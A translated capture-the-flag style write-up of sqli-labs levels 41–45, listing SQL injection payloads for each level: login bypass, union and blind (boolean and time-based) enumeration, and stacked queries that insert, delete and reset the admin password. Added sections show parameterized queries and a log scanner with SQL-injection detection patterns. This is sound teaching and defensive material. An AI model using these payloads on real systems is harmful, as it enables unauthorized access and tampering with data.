SQL Lab (41~45) (to be updated continuously)
2022-07-07 12:24:00 【hcjtn】
sql-lab-41
Same as level 40: stacked-query injection combined with time-based blind injection; we find that only the closing (how the parameter is quoted) differs.
Determine the table name: ?id=1' and if((ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101),sleep(5),1)-- q    The first character is e.
Determine the column name: ?id=1' and if((ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),1,1))=105),sleep(5),1)-- q    The first character is i.
So we try to insert a row with a stacked statement:
?id=1;insert into users(id,username,password)values(20,'hcjtn','1234')-- q
We can also try to modify the row we just inserted:
?id=1;update users set username='tn' where id=20-- q
Then try to delete it again:
?id=1;delete from users where id=20-- q
sql-lab-42
Opening level 42, we find it looks very much like the second-order injection interface from before.
Back then we registered a new user and carried the SQL payload in through second-order injection, but this level does not let us create new users,
so we have to find its injection point on the login form itself: when we enter ' or 1=1-- q in the password field,
we find that the injection point is the password field.
So we can use stacked injection to change the admin password.
Step one: determine the table name and column names.
Determine the table name:
' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #
The tables found are emails, referers, uagents and users.
Determine the column names:
' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='users'-- q
The users table has the three columns id, username and password.
Then we use stacked injection to change the administrator password:
';update users set password='hcjtn' where username='admin'#-- q
Then logging in with username admin and password hcjtn succeeds.
sql-lab-43
Same first-stage injection point as sql-lab-42: entering ')or 1=1# in the password field logs us in, so the injection point is the password field.
The only difference between level 43 and level 42 is the closing (quoting) style;
everything else is exactly the same.
First determine the table name and column names.
Determine the table name:
') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #
Determine the column names:
') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'#
Use stacked injection to change the administrator password:
1');update users set password='hcjtn' where username='admin'#
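The sink behind every one of these levels is a query assembled by string concatenation. As an added example (not code from the original post or from sqli-labs), here is the login query of levels 42-45 in that vulnerable form next to its parameterized replacement, run against an in-memory SQLite table whose contents are constructed. The lab itself runs on MySQL; the `-- q` terminator is used below because both dialects accept it, while `#` is MySQL-only.

```python
import sqlite3


def make_db():
    """Constructed users table; the lab stores an 'admin' row the same way."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.execute("INSERT INTO users VALUES (1, 'admin', 'correct-horse')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """The lab's pattern: user input spliced straight into the SQL text."""
    sql = (
        "SELECT id FROM users WHERE username='" + username
        + "' AND password='" + password + "'"
    )
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        # sqlite3's execute() runs one statement per call, so a stacked
        # ';update ...' tail fails here; mysqli_multi_query(), which the
        # lab uses, would run the second statement as well.
        return False


def login_safe(conn, username, password):
    """Hardened form: placeholders keep the input as data, never as SQL."""
    sql = "SELECT id FROM users WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def admin_password(conn):
    """Helper for checking whether a stacked UPDATE got through."""
    return conn.execute(
        "SELECT password FROM users WHERE username='admin'"
    ).fetchone()[0]


if __name__ == "__main__":
    db = make_db()
    bypass = "' or 1=1-- q"
    stacked = "';update users set password='hcjtn' where username='admin'-- q"
    print("vulnerable login, bypass payload:", login_vulnerable(db, "admin", bypass))  # True
    print("safe login, bypass payload      :", login_safe(db, "admin", bypass))        # False
    login_safe(db, "admin", stacked)
    print("admin password after stacked payload through safe login:", admin_password(db))
```

With placeholders the whole payload is compared against the password column as one literal string, so neither the `or 1=1` bypass nor the stacked `update` ever reaches the parser. Passwords are kept in clear here only because the lab's table is built that way; a real login compares a password hash.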
sql-lab-44
The same interface once again.
First determine the injection point: when we enter ' or 1=1-- q in the password field, login succeeds.
Injection point: password
The difference between this level and 42: this level shows no visible sign of an error message.
So we can only use boolean-based blind injection:
Determine the database name:
'or (ascii(substr((database()),1,1)))=115#
This shows the first character of the database name is s.
'or (ascii(substr((database()),2,1)))=101#
This shows the second character of the database name is e.
Determine the table name:
'or (ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)))=101-- q
The tables found are emails, referers, uagents and users.
Determine the column names:
'and (ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),1,1)))=105-- q
The users table has the three columns id, username and password.
Then change the admin password:
';update users set password='hcjtn' where username='admin'#
Click, and that's it.
sql-lab-45
The injection point is the password field: ')or 1=1 #
Use time-based blind injection.
Determine the database name: ')or if((ascii(substr(database(),1,1))=115),sleep(5),1)-- q    The first character is s.
Determine the table name: ')or if((ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101),sleep(5),1)-- q    The first character is e.
Determine the column name: ')or if((ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),1,1))=105),sleep(5),1)-- q    The first character is i.
Get data: ')or (ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),1,1)))=105-- q    The first character is i.
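From the defender's side, every probe in levels 41-45 leaves a recognisable trace in the web server log: a second statement after `;`, lookups in `information_schema`, `ascii(substr(...))` comparisons, and `sleep()` calls whose requests also take seconds to answer. The scanner below is an added example, not part of the original post. Its log lines are constructed from the requests above (documentation IP ranges, no real traffic), and the format is assumed to be Apache combined with the response time in microseconds (`%D`) appended as a last field; the 4-second threshold is likewise an assumption.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines modelled on the lab requests (not real traffic).
# Fields: Apache combined log with the response time in microseconds (%D) last.
SAMPLE_LOG = """\
203.0.113.5 - - [07/Jul/2022:12:24:00 +0800] "GET /Less-41/?id=1 HTTP/1.1" 200 1034 "-" "Mozilla/5.0" 1200
203.0.113.5 - - [07/Jul/2022:12:24:03 +0800] "GET /Less-41/?id=1%27+and+if((ascii(substr((select+table_name+from+information_schema.tables+where+table_schema=%27security%27+limit+0,1),1,1))=101),sleep(5),1)--+q HTTP/1.1" 200 1034 "-" "Mozilla/5.0" 5004113
203.0.113.5 - - [07/Jul/2022:12:24:09 +0800] "GET /Less-41/?id=1;update+users+set+username=%27tn%27+where+id=20--+q HTTP/1.1" 200 1034 "-" "Mozilla/5.0" 980
198.51.100.7 - - [07/Jul/2022:12:25:00 +0800] "GET /Less-44/?uname=admin&passwd=%27or+(ascii(substr((database()),1,1)))=115%23 HTTP/1.1" 200 990 "-" "Mozilla/5.0" 870
198.51.100.9 - - [07/Jul/2022:12:26:00 +0800] "GET /shop/?id=42&sort=price HTTP/1.1" 200 2210 "-" "Mozilla/5.0" 640
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d+) \S+ "[^"]*" "[^"]*" (?P<micros>\d+)$'
)

# Each rule is (name, pattern applied to the URL-decoded request URL).
RULES = [
    ("stacked-query", re.compile(r";\s*(update|insert|delete|drop)\b", re.I)),
    ("schema-enum", re.compile(r"\binformation_schema\.", re.I)),
    ("boolean-blind", re.compile(r"\bascii\s*\(\s*substr", re.I)),
    ("time-blind", re.compile(r"\b(sleep|benchmark)\s*\(", re.I)),
]

# Assumed threshold: a request that took at least this long and carries a
# sleep()/benchmark() call is treated as a confirmed time-based probe.
SLOW_MICROS = 4_000_000


def scan_log(text):
    """Return one finding per log line that matches at least one rule."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a real pipeline would count these
        decoded = unquote_plus(m["url"])  # one decoding pass, see note below
        rules = [name for name, pat in RULES if pat.search(decoded)]
        if not rules:
            continue
        findings.append({
            "line": lineno,
            "ip": m["ip"],
            "url": decoded,
            "rules": rules,
            "slow": int(m["micros"]) >= SLOW_MICROS,
        })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        flag = " (slow response: time-blind confirmed)" if f["slow"] else ""
        print(f'line {f["line"]} {f["ip"]} {",".join(f["rules"])}{flag}')
        print("   ", f["url"])
```

Two caveats for real use: levels 42-45 inject through a POST body, which the access log does not record, so those probes only show up in the application or database query log or at a WAF; and the scanner URL-decodes once, so double-encoded payloads need a second `unquote_plus` pass before the rules are applied.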